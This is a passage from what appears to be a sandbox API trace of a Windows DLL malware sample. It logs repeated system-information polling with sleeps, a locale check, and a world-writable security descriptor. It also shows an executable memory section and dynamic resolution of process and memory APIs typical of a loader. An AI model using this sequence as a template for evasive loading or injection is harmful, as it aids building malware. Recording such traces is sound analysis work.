hHeap=0xb50000) returned 1 [0041.997] Sleep (dwMilliseconds=0x90) [0042.154] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x30) returned 0xf487d0 [0042.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x30, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.155] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.155] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x60) returned 0xf487d0 [0042.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x60, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.156] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.156] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x90) returned 0xf487d0 [0042.156] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x90, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.156] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.157] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0xc0) returned 0xf487d0 [0042.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0xc0, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0x0 [0042.158] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.158] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x1000) returned 0xf487d0 [0042.158] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.158] Sleep (dwMilliseconds=0x20) [0042.196] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x30) returned 0xf487d0 [0042.196] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x30, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.197] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.197] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x60) returned 0xf487d0 [0042.197] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x60, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.198] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.198] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x90) returned 0xf487d0 [0042.198] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x90, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.199] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.199] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0xc0) returned 0xf487d0 [0042.199] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0xc0, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0x0 [0042.199] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.199] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x1000) returned 0xf487d0 [0042.200] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.200] Sleep (dwMilliseconds=0x70) [0042.323] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x30) returned 0xf487d0 [0042.323] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x30, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.324] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.324] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x60) returned 0xf487d0 [0042.324] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x60, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.325] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.325] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x90) returned 0xf487d0 [0042.325] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x90, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.325] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.325] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0xc0) returned 0xf487d0 [0042.325] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0xc0, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0x0 [0042.326] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.326] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x1000) returned 0xf487d0 [0042.326] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.326] Sleep (dwMilliseconds=0x60) [0042.431] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x30) returned 0xf487d0 [0042.431] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x30, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.432] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.432] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x60) returned 0xf487d0 [0042.432] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x60, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.433] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.433] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x90) returned 0xf487d0 [0042.433] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x90, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.433] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.433] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0xc0) returned 0xf487d0 [0042.433] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0xc0, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0x0 [0042.434] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.434] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x1000) returned 0xf487d0 [0042.435] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.435] Sleep (dwMilliseconds=0x50) [0042.524] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x30) returned 0xf487d0 [0042.524] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x30, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.525] HeapFree (hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0) [0042.525] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.525] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x60) returned 0xf487d0 [0042.525] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x60, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.526] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.526] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x90) returned 0xf487d0 [0042.526] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x90, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.527] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.527] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0xc0) returned 0xf487d0 [0042.527] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0xc0, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0x0 [0042.528] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.528] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x1000) returned 0xf487d0 [0042.528] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.528] Sleep (dwMilliseconds=0x40) [0042.602] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x30) returned 0xf487d0 [0042.602] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x30, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.603] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.603] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x60) returned 0xf487d0 [0042.604] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x60, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.604] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.604] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x90) returned 0xf487d0 [0042.605] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x90, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.605] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.606] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0xc0) returned 0xf487d0 [0042.606] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0xc0, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0x0 [0042.606] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.606] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x1000) returned 0xf487d0 [0042.607] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.607] Sleep (dwMilliseconds=0x60) [0042.711] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x30) returned 0xf487d0 [0042.711] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x30, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.712] HeapFree (hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0) [0042.712] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.712] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x60) returned 0xf487d0 [0042.712] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x60, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.713] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.713] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x90) returned 0xf487d0 [0042.713] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x90, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.713] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.713] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0xc0) returned 0xf487d0 [0042.713] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0xc0, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0x0 [0042.714] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.714] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x1000) returned 0xf487d0 [0042.714] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.714] Sleep (dwMilliseconds=0xd0) [0042.930] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x30) returned 0xf487d0 [0042.930] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x30, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.931] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.931] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x60) returned 0xf487d0 [0042.931] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x60, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.932] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.932] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x90) returned 0xf487d0 [0042.932] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x90, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0042.933] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.933] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0xc0) returned 0xf487d0 [0042.933] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0xc0, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0x0 [0042.934] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.934] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x1000) returned 0xf487d0 [0042.934] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0042.935] Sleep (dwMilliseconds=0x130) [0043.242] GetLocaleInfoA (in: Locale=0x400, LCType=0x5a, lpLCData=0x104f5b0, cchData=4 | out: lpLCData="US") returned 3 [0043.244] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x208) returned 0xf487d0 [0043.244] GetModuleFileNameW (in: hModule=0x410000, lpFilename=0xf487d0, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\Desktop\\e609894b274a6c42e971e8082af8fd167ade4aef5d1a3816d5acea04839f0b35.dll" (normalized: "c:\\users\\keecfmwgj\\desktop\\e609894b274a6c42e971e8082af8fd167ade4aef5d1a3816d5acea04839f0b35.dll")) returned 0x5e [0043.244] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\Desktop\\e609894b274a6c42e971e8082af8fd167ade4aef5d1a3816d5acea04839f0b35.dll", lpszLongPath=0x0, cchBuffer=0x0 | out: lpszLongPath=0x0) returned 0x60 [0043.246] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0xc2) returned 0xf489e0 [0043.246] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\Desktop\\e609894b274a6c42e971e8082af8fd167ade4aef5d1a3816d5acea04839f0b35.dll", lpszLongPath=0xf489e0, cchBuffer=0x60 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\Desktop\\e609894b274a6c42e971e8082af8fd167ade4aef5d1a3816d5acea04839f0b35.dll") returned 0x5f [0043.248] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0043.248] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x75141215, lpParameter=0x69b25f44, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc4 [0043.250] QueueUserAPC (pfnAPC=0x411490, hThread=0xc4, dwData=0x104f598) returned 0x1 [0043.250] WaitForSingleObject (hHandle=0xc4, dwMilliseconds=0xffffffff) [0043.250] WaitForSingleObject (hHandle=0xc4, dwMilliseconds=0xffffffff) Thread: id = 3 os_tid = 0xef0 [0043.251] ConvertStringSecurityDescriptorToSecurityDescriptorA (in: StringSecurityDescriptor="S:(ML;;NW;;;LW)D:(A;;0x1fffff;;;WD)(A;;0x1fffff;;;S-1-15-2-1)(A;;0x1fffff;;;S-1-15-3-1)", StringSDRevision=0x1, SecurityDescriptor=0x4141cc, SecurityDescriptorSize=0x0 | out: SecurityDescriptor=0x4141cc*=0x0*(Revision=0x1, Sbz1=0x0, Control=0x8014, Owner=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x14), Group=0x0*(Revision=0x0, SubAuthorityCount=0x0, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x14, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x30), Sacl=0x14*(AclRevision=0x14, Sbz1=0x0, AclSize=0x0, AceCount=0x30, Sbz2=0x0), Dacl=0x30*(AclRevision=0x30, Sbz1=0x0, AclSize=0x0, AceCount=0x2, Sbz2=0x1c)), SecurityDescriptorSize=0x0) returned 1 [0043.260] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0xb001) returned 0xec9590 [0043.261] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\Desktop\\e609894b274a6c42e971e8082af8fd167ade4aef5d1a3816d5acea04839f0b35.dll") returned 95 [0043.261] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x11ff1f8 | out: lpSystemTimeAsFileTime=0x11ff1f8*(dwLowDateTime=0x2863fc60, dwHighDateTime=0x1d92f76)) [0043.261] _snwprintf (in: _Dest=0x11ff1cc, _Count=0x16, _Format="%S%x" | out: _Dest="Local\\12d15") returned 11 [0043.261] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x4141c8, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc8, lpName="Local\\12d15") returned 0x108 [0043.261] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2e0000 [0043.262] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x20) returned 0xf487d0 [0043.262] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77460000 [0043.262] GetProcAddress (hModule=0x77460000, lpProcName="ZwCreateSection") returned 0x7747ff94 [0043.262] GetProcAddress (hModule=0x77460000, lpProcName="ZwMapViewOfSection") returned 0x7747fc40 [0043.262] GetProcAddress (hModule=0x77460000, lpProcName="ZwUnmapViewOfSection") returned 0x7747fc70 [0043.262] GetProcAddress (hModule=0x77460000, lpProcName="RtlNtStatusToDosError") returned 0x774961ed [0043.262] GetProcAddress (hModule=0x77460000, lpProcName="ZwClose") returned 0x7747f9d0 [0043.262] NtCreateSection (in: SectionHandle=0x11ff1b8, DesiredAccess=0xf001f, ObjectAttributes=0x11ff198*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), MaximumSize=0x11ff1b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x11ff1b8*=0x10c) returned 0x0 [0043.262] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xffffffff, BaseAddress=0x11ff1bc*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x11ff170*=0, ViewSize=0x11ff178*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x11ff1bc*=0x2f0000, SectionOffset=0x11ff170*=0, ViewSize=0x11ff178*=0xd000) returned 0x0 [0043.263] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77460000 [0043.263] GetProcAddress (hModule=0x77460000, lpProcName="ZwQueryInformationToken") returned 0x7747fb98 [0043.263] GetProcAddress (hModule=0x77460000, lpProcName="ZwOpenProcess") returned 0x7747fc10 [0043.263] GetProcAddress (hModule=0x77460000, lpProcName="ZwClose") returned 0x7747f9d0 [0043.264] GetProcAddress (hModule=0x77460000, lpProcName="ZwOpenProcessToken") returned 0x774810b0 [0043.264] GetProcAddress (hModule=0x77460000, lpProcName="_snwprintf") returned 0x77492417 [0043.264] GetProcAddress (hModule=0x77460000, lpProcName="memcpy") returned 0x77482340 [0043.264] GetProcAddress (hModule=0x77460000, lpProcName="strcpy") returned 0x774dc300 [0043.264] GetProcAddress (hModule=0x77460000, lpProcName="sprintf") returned 0x775353c3 [0043.264] GetProcAddress (hModule=0x77460000, lpProcName="mbstowcs") returned 0x774da152 [0043.264] GetProcAddress (hModule=0x77460000, lpProcName="_snprintf") returned 0x77534760 [0043.264] GetProcAddress (hModule=0x77460000, lpProcName="wcstombs") returned 0x77535835 [0043.264] GetProcAddress (hModule=0x77460000, lpProcName="memset") returned 0x7748df20 [0043.264] GetProcAddress (hModule=0x77460000, lpProcName="_aulldiv") returned 0x774bb140 [0043.264] GetProcAddress (hModule=0x77460000, lpProcName="_allmul") returned 0x774a2760 [0043.265] GetProcAddress (hModule=0x77460000, lpProcName="_aullrem") returned 0x774a0a90 [0043.265] GetProcAddress (hModule=0x77460000, lpProcName="RtlUnwind") returned 0x774a6d39 [0043.265] GetProcAddress (hModule=0x77460000, lpProcName="NtQueryVirtualMemory") returned 0x7747fbc8 [0043.265] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x75130000 [0043.265] GetProcAddress (hModule=0x75130000, lpProcName="RaiseException") returned 0x7514585e [0043.265] GetProcAddress (hModule=0x75130000, lpProcName="LocalAlloc") returned 0x7514166c [0043.265] GetProcAddress (hModule=0x75130000, lpProcName="HeapAlloc") returned 0x7748e026 [0043.265] GetProcAddress (hModule=0x75130000, lpProcName="InterlockedIncrement") returned 0x751413e0 [0043.265] GetProcAddress (hModule=0x75130000, lpProcName="InterlockedDecrement") returned 0x751413d0 [0043.265] GetProcAddress (hModule=0x75130000, lpProcName="HeapFree") returned 0x751414a9 [0043.265] GetProcAddress (hModule=0x75130000, lpProcName="SetEvent") returned 0x751416a5 [0043.266] GetProcAddress (hModule=0x75130000, lpProcName="GetTickCount") returned 0x7514110c [0043.266] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemTimeAsFileTime") returned 0x751434b9 [0043.266] GetProcAddress (hModule=0x75130000, lpProcName="Sleep") returned 0x751410ff [0043.266] GetProcAddress (hModule=0x75130000, lpProcName="HeapDestroy") returned 0x75143567 [0043.266] GetProcAddress (hModule=0x75130000, lpProcName="HeapCreate") returned 0x751449e5 [0043.266] GetProcAddress (hModule=0x75130000, lpProcName="SwitchToThread") returned 0x7515efbc [0043.266] GetProcAddress (hModule=0x75130000, lpProcName="lstrlenA") returned 0x75145a03 [0043.266] GetProcAddress (hModule=0x75130000, lpProcName="SetWaitableTimer") returned 0x7516bb0f [0043.266] GetProcAddress (hModule=0x75130000, lpProcName="Process32First") returned 0x75168abb [0043.266] GetProcAddress (hModule=0x75130000, lpProcName="WaitForSingleObject") returned 0x75141136 [0043.266] GetProcAddress (hModule=0x75130000, lpProcName="SleepEx") returned 0x75141215 [0043.267] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventA") returned 0x7514323c [0043.267] GetProcAddress (hModule=0x75130000, lpProcName="lstrlenW") returned 0x751416e0 [0043.267] GetProcAddress (hModule=0x75130000, lpProcName="GetLastError") returned 0x751411c0 [0043.267] GetProcAddress (hModule=0x75130000, lpProcName="GetProcAddress") returned 0x75141222 [0043.267] GetProcAddress (hModule=0x75130000, lpProcName="Process32Next") returned 0x75168812 [0043.267] GetProcAddress (hModule=0x75130000, lpProcName="WaitForMultipleObjects") returned 0x751441d8 [0043.267] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleA") returned 0x75141245 [0043.267] GetProcAddress (hModule=0x75130000, lpProcName="CreateToolhelp32Snapshot") returned 0x75167327 [0043.267] GetProcAddress (hModule=0x75130000, lpProcName="CloseHandle") returned 0x751413f0 [0043.267] GetProcAddress (hModule=0x75130000, lpProcName="CreateWaitableTimerA") returned 0x751c51c4 [0043.267] GetProcAddress (hModule=0x75130000, lpProcName="lstrcpyA") returned 0x75162a6d [0043.268] GetProcAddress (hModule=0x75130000, lpProcName="ResetEvent") returned 0x751416bd [0043.268] GetProcAddress (hModule=0x75130000, lpProcName="lstrcmpW") returned 0x751458e1 [0043.268] GetProcAddress (hModule=0x75130000, lpProcName="GetVersionExA") returned 0x751434c9 [0043.268] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryA") returned 0x7514498f [0043.268] GetProcAddress (hModule=0x75130000, lpProcName="FreeLibrary") returned 0x75143478 [0043.268] GetProcAddress (hModule=0x75130000, lpProcName="EnterCriticalSection") returned 0x774822b0 [0043.268] GetProcAddress (hModule=0x75130000, lpProcName="LeaveCriticalSection") returned 0x77482270 [0043.268] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSection") returned 0x77492c42 [0043.268] GetProcAddress (hModule=0x75130000, lpProcName="lstrcmpA") returned 0x7515ecbb [0043.268] GetProcAddress (hModule=0x75130000, lpProcName="CreateFileMappingW") returned 0x751418e9 [0043.268] GetProcAddress (hModule=0x75130000, lpProcName="MapViewOfFile") returned 0x751418d1 [0043.269] GetProcAddress (hModule=0x75130000, lpProcName="InterlockedExchange") returned 0x75141442 [0043.269] GetProcAddress (hModule=0x75130000, lpProcName="ExpandEnvironmentStringsW") returned 0x7514412b [0043.269] GetProcAddress (hModule=0x75130000, lpProcName="ExpandEnvironmentStringsA") returned 0x7515eb09 [0043.269] GetProcAddress (hModule=0x75130000, lpProcName="QueryPerformanceFrequency") returned 0x751441a8 [0043.269] GetProcAddress (hModule=0x75130000, lpProcName="OpenProcess") returned 0x75141966 [0043.269] GetProcAddress (hModule=0x75130000, lpProcName="GetVersion") returned 0x7514441f [0043.269] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessId") returned 0x751411f8 [0043.269] GetProcAddress (hModule=0x75130000, 